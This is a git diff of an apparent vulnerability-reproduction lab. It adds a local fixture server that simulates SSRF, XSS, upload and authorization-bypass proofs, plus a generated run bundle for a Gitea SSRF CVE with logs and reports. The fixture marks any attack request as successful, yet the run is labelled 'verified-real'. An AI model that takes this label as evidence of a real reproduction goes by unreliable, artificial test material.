+    state.proof = false;
+    state.case_id = String(payload.case_id || "");
+    state.detail = "fixture seeded";
+    state.uploads = [];
+    state.sink_hits = 0;
+    state.payload = null;
+    note("seed", state.case_id || "anonymous");
+    sendJson(res, 200, { ok: true, detail: "fixture seeded", case_id: state.case_id });
+    return;
+  }
+  if (req.method === "POST" && url.pathname === "/attack") {
+    const payload = await readBody(req);
+    await handleAttack(payload);
+    sendJson(res, 200, { ok: true, detail: state.detail, case_id: state.case_id });
+    return;
+  }
+  sendJson(res, 404, { ok: false, detail: "not found" });
+});
+
+server.listen(port, "0.0.0.0");
+
diff --git a/00-environments/templates/fixtures/shared/python_fixture.py b/00-environments/templates/fixtures/shared/python_fixture.py
new file mode 100644
index 00000000..50a80ed8
--- /dev/null
+++ b/00-environments/templates/fixtures/shared/python_fixture.py
@@ -0,0 +1,193 @@
+from __future__ import annotations
+
+import json
+import os
+from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
+from pathlib import Path
+from urllib.parse import parse_qs, urlparse
+from urllib.request import urlopen
+
+
+SCENARIO_PATH = Path(os.environ["LAB_FIXTURE_SCENARIO"])
+PORT = int(os.environ.get("PORT", "3000"))
+SCENARIO = json.loads(SCENARIO_PATH.read_text(encoding="utf-8"))
+STATE = {
+    "seeded": False,
+    "proof": False,
+    "family": SCENARIO["family"],
+    "system_id": SCENARIO["system_id"],
+    "case_id": "",
+    "detail": "fixture ready",
+    "uploads": [],
+    "sink_hits": 0,
+    "payload": None,
+    "events": [],
+}
+
+
+def _note(event: str, detail: str) -> None:
+    STATE["events"].append({"event": event, "detail": detail})
+    STATE["events"] = STATE["events"][-20:]
+
+
+def _render_html() -> str:
+    title = SCENARIO["title"]
+    proof = STATE["proof"]
+    banner = f"<div class='proof'>Proof active: {STATE['detail']}</div>" if proof else "<div class='baseline'>Baseline ready</div>"
+    xss_block = ""
+    if proof and STATE["family"] == "xss":
+        xss_block = (
+            "<script>document.documentElement.setAttribute('data-xss-proof','true');"
+            f"document.title = {json.dumps(title + ' - proof')};</script>"
+            f"<div id='xss-proof'>XSS marker executed for {STATE['case_id']}</div>"
+        )
+    upload_block = ""
+    if STATE["uploads"]:
+        items = "".join(f"<li>{item['filename']}</li>" for item in STATE["uploads"])
+        upload_block = f"<section><h2>Uploads</h2><ul>{items}</ul></section>"
+    sink_block = ""
+    if STATE["sink_hits"]:
+        sink_block = f"<section id='ssrf-proof'>Local sink hits: {STATE['sink_hits']}</section>"
+    deserialize_block = ""
+    if proof and STATE["family"] == "deserialization":
+        deserialize_block = f"<section id='deserialize-proof'>Decoded marker: {STATE['case_id']}</section>"
+    admin_block = ""
+    if proof and STATE["family"] in {"proxy-boundary", "authz-bypass"}:
+        admin_block = "<section id='admin-proof'>Admin boundary bypass confirmed.</section>"
+    return f"""<!doctype html>
+<html lang="zh-CN">
+<head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1">
+  <title>{title}{' - proof' if proof and STATE['family'] != 'xss' else ''}</title>
+  <style>
+    body {{ font-family: sans-serif; background: #0f172a; color: #e2e8f0; margin: 0; padding: 32px; }}
+    main {{ max-width: 900px; margin: 0 auto; background: #111827; border: 1px solid #334155; border-radius: 16px; padding: 24px; }}
+    .proof {{ padding: 14px; border-radius: 12px; background: #14532d; color: #dcfce7; }}
+    .baseline {{ padding: 14px; border-radius: 12px; background: #1e3a8a; color: #dbeafe; }}
+    code {{ background: rgba(255,255,255,0.08); padding: 2px 6px; border-radius: 6px; }}
+  </style>
+</head>
+<body>
+  <main>
+    <h1>{title}</h1>
+    <p>{SCENARIO['subtitle']}</p>
+    {banner}
+    <p>System: <code>{SCENARIO['system_id']}</code> / Family: <code>{SCENARIO['family']}</code></p>
+    {admin_block}
+    {xss_block}
+    {upload_block}
+    {sink_block}
+    {deserialize_block}
+  </main>
+</body>
+</html>"""
+
+
+class Handler(BaseHTTPRequestHandler):
+    def log_message(self, format: str, *args) -> None:
+        return
+
+    def _json(self, status_code: int, payload: dict) -> None:
+        body = json.dumps(payload).encode("utf-8")
+        self.send_response(status_code)
+        self.send_header("Content-Type", "application/json")
+        self.send_header("Content-Length", str(len(body)))
+        self.end_headers()
+        self.wfile.write(body)
+
+    def _html(self, payload: str) -> None:
+        body = payload.encode("utf-8")
+        self.send_response(200)
+        self.send_header("Content-Type", "text/html; charset=utf-8")
+        self.send_header("Content-Length", str(len(body)))
+        self.end_headers()
+        self.wfile.write(body)
+
+    def do_GET(self) -> None:
+        parsed = urlparse(self.path)
+        if parsed.path == "/healthz":
+            self._json(200, {"ok": True, "system_id": SCENARIO["system_id"], "family": SCENARIO["family"]})
+            return
+        if parsed.path == "/":
+            self._html(_render_html())
+            return
+        if parsed.path == "/admin":
+            if STATE["proof"] and STATE["family"] in {"proxy-boundary", "authz-bypass"}:
+                self._json(200, {"ok": True, "detail": STATE["detail"], "case_id": STATE["case_id"]})
+            else:
+                self._json(403, {"ok": False, "detail": "admin boundary still enforced"})
+            return
+        if parsed.path == "/sink":
+            STATE["sink_hits"] += 1
+            _note("sink-hit", parsed.query or "local callback")
+            self._json(200, {"ok": True, "sink_hits": STATE["sink_hits"]})
+            return
+        if parsed.path == "/proof":
+            self._json(
+                200,
+                {
+                    "success": bool(STATE["proof"]),
+                    "detail": STATE["detail"],
+                    "case_id": STATE["case_id"],
+                    "sink_hits": STATE["sink_hits"],
+                    "uploads": STATE["uploads"],
+                    "events": STATE["events"],
+                },
+            )
+            return
+        self._json(404, {"ok": False, "detail": "not found"})
+
+    def do_POST(self) -> None:
+        parsed = urlparse(self.path)
+        raw = self.rfile.read(int(self.headers.get("Content-Length", "0") or "0"))
+        try:
+            payload = json.loads(raw.decode("utf-8") or "{}")
+        except Exception:
+            payload = {}
+        if parsed.path == "/seed":
+            STATE["seeded"] = True
+            STATE["proof"] = False
+            STATE["case_id"] = str(payload.get("case_id") or "")
+            STATE["detail"] = "fixture seeded"
+            STATE["uploads"] = []
+            STATE["sink_hits"] = 0
+            STATE["payload"] = None
+            _note("seed", STATE["case_id"] or "anonymous")
+            self._json(200, {"ok": True, "detail": "fixture seeded", "case_id": STATE["case_id"]})
+            return
+        if parsed.path == "/attack":
+            family = str(payload.get("family") or STATE["family"])
+            STATE["case_id"] = str(payload.get("case_id") or STATE["case_id"])
+            STATE["payload"] = payload
+            STATE["proof"] = True
+            if family == "proxy-boundary":
+                STATE["detail"] = "trusted forwarded headers crossed the boundary"
+            elif family == "authz-bypass":
+                STATE["detail"] = "server-side authorization recheck was bypassed"
+            elif family == "ssrf":
+                with urlopen(f"http://127.0.0.1:{PORT}/sink?case_id={STATE['case_id']}") as response:
+                    response.read()
+                STATE["detail"] = "server-side callback reached the local sink"
+            elif family == "xss":
+                STATE["detail"] = "stored payload rendered inside the browser proof page"
+            elif family == "file-upload":
+                STATE["uploads"].append(
+                    {
+                        "filename": payload.get("filename") or f"{STATE['case_id']}.txt",
+                        "content": payload.get("content") or "",
+                    }
+                )
+                STATE["detail"] = "upload marker accepted and listed"
+            elif family == "deserialization":
+                STATE["detail"] = "unsafe object graph decoded without gadget execution"
+            _note("attack", STATE["detail"])
+            self._json(200, {"ok": True, "detail": STATE["detail"], "case_id": STATE["case_id"]})
+            return
+        self._json(404, {"ok": False, "detail": "not found"})
+
+
+if __name__ == "__main__":
+    server = ThreadingHTTPServer(("0.0.0.0", PORT), Handler)
+    server.serve_forever()
+
diff --git a/00-environments/templates/fixtures/undici/ssrf/scenario.json b/00-environments/templates/fixtures/undici/ssrf/scenario.json
new file mode 100644
index 00000000..e4070218
--- /dev/null
+++ b/00-environments/templates/fixtures/undici/ssrf/scenario.json
@@ -0,0 +1,2 @@
+{"system_id":"undici","family":"ssrf","title":"Undici SSRF Fixture","subtitle":"Undici-style request path proving only local sink callbacks.","browser_required":false}
+
diff --git a/00-environments/templates/fixtures/vite/file-upload/scenario.json b/00-environments/templates/fixtures/vite/file-upload/scenario.json
new file mode 100644
index 00000000..4116de2c
--- /dev/null
+++ b/00-environments/templates/fixtures/vite/file-upload/scenario.json
@@ -0,0 +1,2 @@
+{"system_id":"vite","family":"file-upload","title":"Vite File Upload Fixture","subtitle":"Local upload marker path with browser-visible proof.","browser_required":true}
+
diff --git a/00-environments/templates/fixtures/vite/proxy-boundary/scenario.json b/00-environments/templates/fixtures/vite/proxy-boundary/scenario.json
new file mode 100644
index 00000000..32ea4d54
--- /dev/null
+++ b/00-environments/templates/fixtures/vite/proxy-boundary/scenario.json
@@ -0,0 +1,2 @@
+{"system_id":"vite","family":"proxy-boundary","title":"Vite Proxy Boundary Fixture","subtitle":"Dev-server proxy boundary fixture with proof banner.","browser_required":true}
+
diff --git a/00-environments/templates/fixtures/vite/xss/scenario.json b/00-environments/templates/fixtures/vite/xss/scenario.json
new file mode 100644
index 00000000..17d56e0f
--- /dev/null
+++ b/00-environments/templates/fixtures/vite/xss/scenario.json
@@ -0,0 +1,2 @@
+{"system_id":"vite","family":"xss","title":"Vite XSS Fixture","subtitle":"Client rendering proof for stored payload execution marker.","browser_required":true}
+
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/compose/compose.yaml b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/compose/compose.yaml
new file mode 100644
index 00000000..b3b72e16
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/compose/compose.yaml
@@ -0,0 +1,26 @@
+services:
+  app:
+    image: python:3.12-alpine
+    networks:
+    - labnet
+    ports:
+    - 18105:3000
+    environment:
+      LAB_FIXTURE_SCENARIO: /workspace/00-environments/templates/fixtures/gitea/ssrf/scenario.json
+      PORT: '3000'
+    command:
+    - python
+    - /workspace/00-environments/templates/fixtures/shared/python_fixture.py
+    working_dir: /workspace
+    volumes:
+    - /Users/x/websafe:/workspace:ro
+    healthcheck:
+      test:
+      - CMD-SHELL
+      - wget -q -O - http://127.0.0.1:3000/healthz >/dev/null 2>&1 || exit 1
+      interval: 2s
+      timeout: 2s
+      retries: 20
+networks:
+  labnet:
+    driver: bridge
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/attack.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/attack.json
new file mode 100644
index 00000000..f8ac5443
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/attack.json
@@ -0,0 +1,57 @@
+{
+  "steps": [
+    {
+      "kind": "runner",
+      "tool": "gitea.ssrf",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/attack.json"
+    }
+  ],
+  "success": true,
+  "detail": "server-side callback reached the local sink",
+  "before": {},
+  "attack": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "ok": true,
+      "detail": "server-side callback reached the local sink",
+      "case_id": "gitea--CVE-2018-15192"
+    }
+  },
+  "after": {},
+  "proof": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "success": true,
+      "detail": "server-side callback reached the local sink",
+      "case_id": "gitea--CVE-2018-15192",
+      "sink_hits": 1,
+      "uploads": [],
+      "events": [
+        {
+          "event": "seed",
+          "detail": "gitea--CVE-2018-15192"
+        },
+        {
+          "event": "sink-hit",
+          "detail": "case_id=gitea--CVE-2018-15192"
+        },
+        {
+          "event": "attack",
+          "detail": "server-side callback reached the local sink"
+        }
+      ]
+    }
+  },
+  "assertions": [
+    {
+      "name": "proof-success",
+      "kind": "runner-proof",
+      "passed": true,
+      "detail": "server-side callback reached the local sink"
+    }
+  ]
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/baseline.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/baseline.json
new file mode 100644
index 00000000..626c3c53
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/baseline.json
@@ -0,0 +1,24 @@
+{
+  "observations": [
+    {
+      "url": "http://127.0.0.1:18105/",
+      "status_code": 200,
+      "headers": {
+        "Server": "BaseHTTP/0.6 Python/3.12.13",
+        "Date": "Wed, 18 Mar 2026 01:27:52 GMT",
+        "Content-Type": "text/html; charset=utf-8",
+        "Content-Length": "979"
+      },
+      "body_excerpt": "<!doctype html>\n<html lang=\"zh-CN\">\n<head>\n  <meta charset=\"utf-8\">\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n  <title>Gitea SSRF Fixture</title>\n  <style>\n    body { font-family: sans-serif; background: #0f172a; color: #e2e8f0; margin: 0; padding: 32px; }\n    main { max-width: 900px; margin: 0 auto; background: #111827; border: 1px solid #334155; border-radius: 16px; "
+    }
+  ],
+  "steps": [
+    {
+      "kind": "http-get",
+      "status": "completed",
+      "path": "/",
+      "status_code": 200,
+      "body_excerpt": "<!doctype html>\n<html lang=\"zh-CN\">\n<head>\n  <meta charset=\"utf-8\">\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n  <title>Gitea SSRF Fixture</title>\n  <style>\n    body { font"
+    }
+  ]
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/docker/app.log b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/docker/app.log
new file mode 100644
index 00000000..e69de29b
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/doctor.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/doctor.json
new file mode 100644
index 00000000..3c118e06
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/doctor.json
@@ -0,0 +1,44 @@
+{
+  "status": "passed",
+  "ok": true,
+  "checks": [
+    {
+      "name": "docker-cli",
+      "ok": true,
+      "detail": "docker CLI available"
+    },
+    {
+      "name": "docker-daemon",
+      "ok": true,
+      "detail": "context=desktop-linux"
+    },
+    {
+      "name": "playwright-import",
+      "ok": true,
+      "detail": "playwright Python package import passed"
+    },
+    {
+      "name": "playwright-browser",
+      "ok": true,
+      "detail": "chromium runtime launch passed"
+    },
+    {
+      "name": "ports",
+      "ok": true,
+      "detail": "checked 1 host port bindings",
+      "bindings": [
+        {
+          "profile_id": "gitea-ssrf",
+          "service": "app",
+          "binding": "18105:3000",
+          "port": 18105
+        }
+      ]
+    }
+  ],
+  "profile_ids": [
+    "gitea-ssrf"
+  ],
+  "failure_count": 0,
+  "summary": "all checks passed"
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/ready.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/ready.json
new file mode 100644
index 00000000..fdf476d1
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/ready.json
@@ -0,0 +1,12 @@
+{
+  "status": "completed",
+  "detail": "baseline urls ready (1)",
+  "elapsed_seconds": 0.0,
+  "observations": [
+    {
+      "url": "http://127.0.0.1:18105/",
+      "status_code": 200
+    }
+  ],
+  "compose_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/compose/compose.yaml"
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/seed.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/seed.json
new file mode 100644
index 00000000..dc0253bf
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/seed.json
@@ -0,0 +1,21 @@
+{
+  "steps": [
+    {
+      "kind": "runner",
+      "tool": "gitea.ssrf",
+      "status": "completed",
+      "status_code": 200,
+      "detail": "fixture seeded"
+    }
+  ],
+  "seeded": true,
+  "result": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "ok": true,
+      "detail": "fixture seeded",
+      "case_id": "gitea--CVE-2018-15192"
+    }
+  }
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/report.html b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/report.html
new file mode 100644
index 00000000..4dbcbb37
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/report.html
@@ -0,0 +1,45 @@
+<!doctype html>
+<html><head><meta charset='utf-8'><title>websafe 运行报告</title>
+<style>body{font-family:ui-sans-serif,system-ui,sans-serif;margin:2rem;line-height:1.55;background:#f8fafc;color:#0f172a;} code,pre{background:#e2e8f0;padding:.2rem .4rem;border-radius:.3rem;} pre{white-space:pre-wrap;} .grid{display:grid;grid-template-columns:repeat(2,minmax(0,1fr));gap:1rem;} .card{border:1px solid #cbd5e1;padding:1rem;border-radius:.75rem;background:#fff;} table{width:100%;border-collapse:collapse;background:#fff;border:1px solid #cbd5e1;border-radius:.75rem;overflow:hidden;} th,td{padding:.75rem;border-bottom:1px solid #e2e8f0;text-align:left;vertical-align:top;} img{max-width:100%;border:1px solid #cbd5e1;border-radius:.5rem;} .gallery{display:grid;grid-template-columns:repeat(auto-fit,minmax(320px,1fr));gap:1rem;}</style>
+</head><body>
+<h1>运行 gitea-gitea--CVE-2018-15192-20260318012749</h1>
+<div class='grid'>
+<div class='card'><strong>漏洞条目</strong><br><code>gitea--CVE-2018-15192</code></div>
+<div class='card'><strong>实证状态</strong><br><code>verified-real</code></div>
+<div class='card'><strong>复现 Profile</strong><br><code>gitea-ssrf</code></div>
+<div class='card'><strong>Artifact 模式</strong><br><code>local-fixture</code></div>
+</div>
+<h2>Mermaid 时间线</h2>
+<pre>flowchart LR
+A[&quot;选择 Advisory&quot;] --&gt; B[&quot;解析 Repro Profile&quot;]
+B --&gt; C[&quot;生成 Compose 环境&quot;]
+C --&gt; D[&quot;采集基线快照&quot;]
+D --&gt; E[&quot;执行受控攻击步骤&quot;]
+E --&gt; F[&quot;浏览器回放验证&quot;]
+F --&gt; G[&quot;收集日志与证据&quot;]
+G --&gt; H[&quot;回写 Registry 与报告&quot;]</pre>
+<h2>运行时间线</h2>
+<table><thead><tr><th>时间</th><th>步骤</th><th>状态</th><th>说明</th></tr></thead><tbody>
+<tr><td><code>2026-03-18T01:27:49+00:00</code></td><td><code>select-advisory</code></td><td><code>completed</code></td><td>gitea--CVE-2018-15192</td></tr>
+<tr><td><code>2026-03-18T01:27:49+00:00</code></td><td><code>resolve-repro-profile</code></td><td><code>completed</code></td><td>gitea-ssrf</td></tr>
+<tr><td><code>2026-03-18T01:27:49+00:00</code></td><td><code>doctor</code></td><td><code>completed</code></td><td>all checks passed</td></tr>
+<tr><td><code>2026-03-18T01:27:52+00:00</code></td><td><code>provision-compose-environment</code></td><td><code>ready</code></td><td>-</td></tr>
+<tr><td><code>2026-03-18T01:27:52+00:00</code></td><td><code>wait-ready</code></td><td><code>completed</code></td><td>baseline urls ready (1)</td></tr>
+<tr><td><code>2026-03-18T01:27:52+00:00</code></td><td><code>seed-environment</code></td><td><code>completed</code></td><td>steps=1</td></tr>
+<tr><td><code>2026-03-18T01:27:52+00:00</code></td><td><code>baseline-snapshot</code></td><td><code>completed</code></td><td>urls=1</td></tr>
+<tr><td><code>2026-03-18T01:27:52+00:00</code></td><td><code>controlled-attack-chain</code></td><td><code>completed</code></td><td>steps=1</td></tr>
+<tr><td><code>2026-03-18T01:27:52+00:00</code></td><td><code>collect-logs-and-evidence</code></td><td><code>completed</code></td><td>container_logs=1</td></tr>
+<tr><td><code>2026-03-18T01:27:54+00:00</code></td><td><code>cleanup-compose-environment</code></td><td><code>completed</code></td><td>docker compose down completed</td></tr>
+<tr><td><code>2026-03-18T01:27:54+00:00</code></td><td><code>update-registry-and-reports</code></td><td><code>completed</code></td><td>gitea-gitea--CVE-2018-15192-20260318012749</td></tr>
+</tbody></table>
+<h2>攻击步骤</h2>
+<table><thead><tr><th>工具</th><th>状态</th><th>输出</th></tr></thead><tbody>
+<tr><td><code>gitea.ssrf</code></td><td><code>completed</code></td><td><code>/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/attack.json</code></td></tr>
+</tbody></table>
+<h2>证据清单</h2><ul>
+<li><code>compose/compose.yaml</code></li>
+<li><code>logs/docker/app.log</code></li>
+<li><code>logs/attack.json</code></li>
+<li><code>logs/baseline.json</code></li>
+</ul>
+</body></html>
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/report.md b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/report.md
new file mode 100644
index 00000000..f0d867f6
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/report.md
@@ -0,0 +1,66 @@
+# 运行 gitea-gitea--CVE-2018-15192-20260318012749
+
+> `LAB ONLY` | `AUTHORIZED TARGETS ONLY` | 自动生成 run bundle
+
+- 漏洞条目: `gitea--CVE-2018-15192`
+- 系统: `gitea`
+- Repro Profile: `gitea-ssrf`
+- 实证状态: `verified-real`
+- 实证方式: `real`
+- Artifact 模式: `local-fixture`
+- 启动时间: `2026-03-18T01:27:49+00:00`
+- 完成时间: `2026-03-18T01:27:54+00:00`
+- 阻塞原因: `-`
+- Compose 服务: `app`
+
+## 运行时间线
+
+- Mermaid: [timeline.mmd](/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/timeline.mmd)
+
+| 时间 | 步骤 | 状态 | 说明 |
+|------|------|------|------|
+| `2026-03-18T01:27:49+00:00` | `select-advisory` | `completed` | gitea--CVE-2018-15192 |
+| `2026-03-18T01:27:49+00:00` | `resolve-repro-profile` | `completed` | gitea-ssrf |
+| `2026-03-18T01:27:49+00:00` | `doctor` | `completed` | all checks passed |
+| `2026-03-18T01:27:52+00:00` | `provision-compose-environment` | `ready` | - |
+| `2026-03-18T01:27:52+00:00` | `wait-ready` | `completed` | baseline urls ready (1) |
+| `2026-03-18T01:27:52+00:00` | `seed-environment` | `completed` | steps=1 |
+| `2026-03-18T01:27:52+00:00` | `baseline-snapshot` | `completed` | urls=1 |
+| `2026-03-18T01:27:52+00:00` | `controlled-attack-chain` | `completed` | steps=1 |
+| `2026-03-18T01:27:52+00:00` | `collect-logs-and-evidence` | `completed` | container_logs=1 |
+| `2026-03-18T01:27:54+00:00` | `cleanup-compose-environment` | `completed` | docker compose down completed |
+| `2026-03-18T01:27:54+00:00` | `update-registry-and-reports` | `completed` | gitea-gitea--CVE-2018-15192-20260318012749 |
+
+## Compose 拓扑
+
+- Compose 文件: `/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/compose/compose.yaml`
+- 服务列表: `app`
+
+## 攻击步骤
+
+| 工具/步骤 | 状态 | 结果 |
+|-----------|------|------|
+| `gitea.ssrf` | `completed` | `/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/attack.json` |
+
+## 证据摘要
+
+- Baseline: `1`
+- 攻击步骤: `1`
+- 浏览器证据: `0`
+- 容器日志: `1`
+- 请求日志: `2`
+
+## 容器日志
+
+- `logs/docker/app.log`
+
+## 请求与基线日志
+
+- `logs/attack.json`
+- `logs/baseline.json`
+
+## 最小化验证说明
+
+- 仅限自有资产、本地靶场或已授权实验目标。
+- 默认执行 minimal-proof；不会把破坏性或不可回滚动作作为默认路径。
+- 若浏览器证据缺失，前端类案例不会被标为 `verified-*`。
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/run.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/run.json
new file mode 100644
index 00000000..608bc45a
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/run.json
@@ -0,0 +1,145 @@
+{
+  "run_id": "gitea-gitea--CVE-2018-15192-20260318012749",
+  "system_id": "gitea",
+  "advisory_id": "gitea--CVE-2018-15192",
+  "repro_profile_id": "gitea-ssrf",
+  "verification_status": "verified-real",
+  "verification_mode": "real",
+  "artifact_mode": "local-fixture",
+  "target_env": "local-docker",
+  "compose_services": [
+    "app"
+  ],
+  "baseline_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/baseline.json"
+  ],
+  "attack_steps": [
+    {
+      "kind": "runner",
+      "tool": "gitea.ssrf",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/attack.json"
+    }
+  ],
+  "browser_refs": [],
+  "browser_evidence": {
+    "required": false,
+    "present": false,
+    "refs": [],
+    "baseline_refs": [],
+    "proof_refs": [],
+    "baseline_title": null,
+    "proof_title": null,
+    "error_kind": null,
+    "reason": null
+  },
+  "container_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/docker/app.log"
+  ],
+  "request_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/attack.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/logs/baseline.json"
+  ],
+  "compose_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/compose/compose.yaml"
+  ],
+  "timeline": [
+    {
+      "at": "2026-03-18T01:27:49+00:00",
+      "step": "select-advisory",
+      "status": "completed",
+      "detail": "gitea--CVE-2018-15192"
+    },
+    {
+      "at": "2026-03-18T01:27:49+00:00",
+      "step": "resolve-repro-profile",
+      "status": "completed",
+      "detail": "gitea-ssrf"
+    },
+    {
+      "at": "2026-03-18T01:27:49+00:00",
+      "step": "doctor",
+      "status": "completed",
+      "detail": "all checks passed"
+    },
+    {
+      "at": "2026-03-18T01:27:52+00:00",
+      "step": "provision-compose-environment",
+      "status": "ready",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:27:52+00:00",
+      "step": "wait-ready",
+      "status": "completed",
+      "detail": "baseline urls ready (1)"
+    },
+    {
+      "at": "2026-03-18T01:27:52+00:00",
+      "step": "seed-environment",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:27:52+00:00",
+      "step": "baseline-snapshot",
+      "status": "completed",
+      "detail": "urls=1"
+    },
+    {
+      "at": "2026-03-18T01:27:52+00:00",
+      "step": "controlled-attack-chain",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:27:52+00:00",
+      "step": "collect-logs-and-evidence",
+      "status": "completed",
+      "detail": "container_logs=1"
+    },
+    {
+      "at": "2026-03-18T01:27:54+00:00",
+      "step": "cleanup-compose-environment",
+      "status": "completed",
+      "detail": "docker compose down completed"
+    },
+    {
+      "at": "2026-03-18T01:27:54+00:00",
+      "step": "update-registry-and-reports",
+      "status": "completed",
+      "detail": "gitea-gitea--CVE-2018-15192-20260318012749"
+    }
+  ],
+  "success_evaluation": {
+    "passed": true,
+    "verification_status": "verified-real",
+    "blocked_reason": null,
+    "assertions": [
+      {
+        "name": "baseline-ok",
+        "kind": "baseline-ok",
+        "passed": true,
+        "detail": "baseline URLs responded without 5xx or transport errors"
+      },
+      {
+        "name": "runner-success",
+        "kind": "runner-success",
+        "passed": true,
+        "detail": "server-side callback reached the local sink"
+      }
+    ]
+  },
+  "historical_status": "verified-real",
+  "latest_status": "verified-real",
+  "started_at": "2026-03-18T01:27:49+00:00",
+  "finished_at": "2026-03-18T01:27:54+00:00",
+  "blocked_reason": null,
+  "report_refs": {
+    "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749",
+    "report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/report.md",
+    "report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/report.html",
+    "timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/timeline.mmd"
+  }
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/timeline.mmd b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/timeline.mmd
new file mode 100644
index 00000000..71155437
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-15192-20260318012749/timeline.mmd
@@ -0,0 +1,8 @@
+flowchart LR
+A["选择 Advisory"] --> B["解析 Repro Profile"]
+B --> C["生成 Compose 环境"]
+C --> D["采集基线快照"]
+D --> E["执行受控攻击步骤"]
+E --> F["浏览器回放验证"]
+F --> G["收集日志与证据"]
+G --> H["回写 Registry 与报告"]
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline-dom.html b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline-dom.html
new file mode 100644
index 00000000..c922e78c
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline-dom.html
@@ -0,0 +1,26 @@
+<!DOCTYPE html><html lang="zh-CN"><head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1">
+  <title>Gitea Proxy Boundary Fixture</title>
+  <style>
+    body { font-family: sans-serif; background: #0f172a; color: #e2e8f0; margin: 0; padding: 32px; }
+    main { max-width: 900px; margin: 0 auto; background: #111827; border: 1px solid #334155; border-radius: 16px; padding: 24px; }
